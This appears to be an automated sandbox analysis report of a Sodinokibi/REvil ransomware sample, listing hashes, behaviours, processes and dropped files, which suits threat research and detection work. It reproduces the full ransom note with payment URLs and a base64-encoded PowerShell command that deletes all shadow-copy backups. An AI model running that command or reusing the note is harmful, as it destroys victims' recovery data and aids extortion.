Analysis

  • max time kernel
    132s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    13/10/2023, 02:48

General

  • Target

    svchost.exe

  • Size

    166KB

  • MD5

    5bab7e6528a56bd5d3a76d01ec3ab45f

  • SHA1

    4b9495fc06c67e4419a0cf3d70b6285e9808afc4

  • SHA256

    1dc818f51827d89a545493921f8648299f3eb367c1e0354969ccaa9df7ce77b5

  • SHA512

    7c59fca6ffa7d1fd55f7c2268c22193d48c4082277f95c882b1e7df93f011a86c036f569c5bb8dc0a83aebe9bf44df9e7f11aac99ea0c33f917e63e80c2b07c4

  • SSDEEP

    3072:EJMawtnGqtWoKeZC62aoNUSncs0whq2aWc54aF:+w9vteQJYUocfWLK

Malware Config

Extracted

Path

C:\Users\459cz5g750-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 459cz5g750. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FC4123773DEB86BF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FC4123773DEB86BF Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 21XddKsGKo2MEpqgaLCO4gB1IIMbWZh5C4G945DMGcFW8WozdPivhAZF34RCQkKg cvPi5QTytv7ru9vCdHC5IVsFxdHbSfr5VA5DLF40YcRrpZJy8qujN/U6Gt1uMyTG Q6clHF2oSfZpx6ekXHDqAWxLJEd9fU4rIfJKL/z3+x1ZMokc0KKb1WKuUGBJL9Fo Kz5W00OV5pbbxWO6/rGqEZtj8lZSvK4x7KOrnRRSOzJzXA2/XJPnmVBtSgFFkLTC ztzDO0dAOoeh4gTLbNm1xYrwYRljhBnvXv94pEfZQF0I8RPe7ajJdzgZL+n1m420 RRnPF02rpaMJVDsEX9DD8lEBUlujk9kLlMnaMdJxk2WaYODlUFwAaJ9hfCGxMiZ2 FLkbvYeXcAXgZ7mSrHeuzdozX2OMm5e07atA76nIzuhxb+odvS2SKkSXwnVeH275 IqpdNsl5ay9I5EEa+Bn/rrHC6sLuCRkhnLj6pxsMM40SJQ86BA3eAYPeQRXfzs/x we59wY9ZtwinDmW4roBtrVpVIV3g8CrIdHZuM1qzKSTjYr7O1px5GZsuOSeIZCdO II7V5ee6O7yWW6x1DxsdOOesohAemplmcbpQXk1rMEDk+X/WBN3lMAu2DWuCOgdv GKDVkmHNAYs0EoqLKW+C9dRyP93gdCVsIJey19qzRkasN3FkcAN0KRyeP0a2lzSZ L3WJFmE9QKzodr3YJPhWZSGSWiyrR12W/UuNLNuc4hKJBFiIiu77Vt+Y6qR3C9kn 1OB5iCO4qxL56G/b5z6l8iFtea+C1PcuXP2FzbG5AArbjWeTKRgO6J5qE06Cmow8 WjwX+doqST8niwaoxozurPynekchmV4kZZi4LEhi1xz/t/b8ChGntggdsOISS5S7 yd1Fle3HY/QnWeM5M4QAClA71LjkxuG9kHxdEMJbqyKIjUMNITBbb5eQ0ewIfpuN iGuU75ZDAyH7q2e77e72f/0oXOlFATTYxAGddXw3MewNz89R69dPS1IZj84onL+G L8+VgdHex4B93bjJBSlnMdLvWDKVHIuNvPIJf3jOtcK8QHm8iREjJk7oKd6fRdKX U0eqzYi0CqipPSYUqicw9aW1kmejOlQXUsMkuOPwdCCRneomdBecYFGVmkXU9P30 wxbIS0GnQmGhW2DSN1Wl1FLuu+UVsJJ/SwqGBbWnIo2gq8Fz6krmv6qVr6lGcwbL /Te/6vmFRjLqEGS+ZYeI615QmU/U4uI4Vwg0UJetinHvibtDR4xONvFjhPBX5pTo CWtKMU1luf2QiGA56cxK0UCpeCIWzbv6/4ONoFTSSDaP5JyCPZRMlCglvcZmGng6 3ViX32rirePcrBcI1VokqhE3eCqORnO8iHysrAkfPQt9UFcKW4iNuw== Extension name: 459cz5g750 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FC4123773DEB86BF

http://decryptor.cc/FC4123773DEB86BF

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2088
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2500

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\459cz5g750-readme.txt

      Filesize

      7KB

      MD5

      c0f0a2d646ac3f7954f3f02cb49b68eb

      SHA1

      551a75a2b4ccf9611edd23b5cc9d5fcaec945519

      SHA256

      de1658af1c787f83345f48f5e0e8308a64e0276a3e51cd6c45116d1fb5fd58d6

      SHA512

      8e5f8c31b10b8acc920693708dd424d36d493c93c61ece0218cdb93d9a48b57e6aed372c7d9305ceab007ff807918976d2cb8cd929fc1a48a6c15a9600acb53b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      f8376b3206e4825fda3b6c64d197df90

      SHA1

      35f310cb4fef178a416ecd020ef79dd515afef65

      SHA256

      ca7009f55eb05d99bfa6671d618b5980625f9c18441d5d69fa1c772a15b0f2c3

      SHA512

      a8a30a3044553e7668e25a5d382af758c51bce76e197076f2afa832f1e0a54c1391a3103f034ec6d53d8f6fb91b1076356faa2c269c69dac875c8ad7d84c532a

    • C:\Users\Admin\AppData\Local\Temp\Cab5BF7.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\Tar5C39.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      194KB

      MD5

      c1a3f542b9a98f11d6d42a915d3c5e92

      SHA1

      97445060d7be3689c6486fad59ce6e4017c8591a

      SHA256

      6b50695942aa027e808aa84fad9bc6cf87b0e7dad25fa570ca4ecc0a7d2ae991

      SHA512

      76778adee729a3fe41756b7c9ade32b4f45d873e925ab2fd763b5705cedd532e97d580a1d9f485c208a31f8ded893834152a3dd9d703ff2c9a82e72bf50c1cd3

    • memory/2428-7-0x0000000002730000-0x00000000027B0000-memory.dmp

      Filesize

      512KB

    • memory/2428-10-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2428-11-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2428-9-0x0000000002730000-0x00000000027B0000-memory.dmp

      Filesize

      512KB

    • memory/2428-8-0x0000000002730000-0x00000000027B0000-memory.dmp

      Filesize

      512KB

    • memory/2428-4-0x000000001B410000-0x000000001B6F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2428-6-0x000007FEF44B0000-0x000007FEF4E4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2428-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

      Filesize

      32KB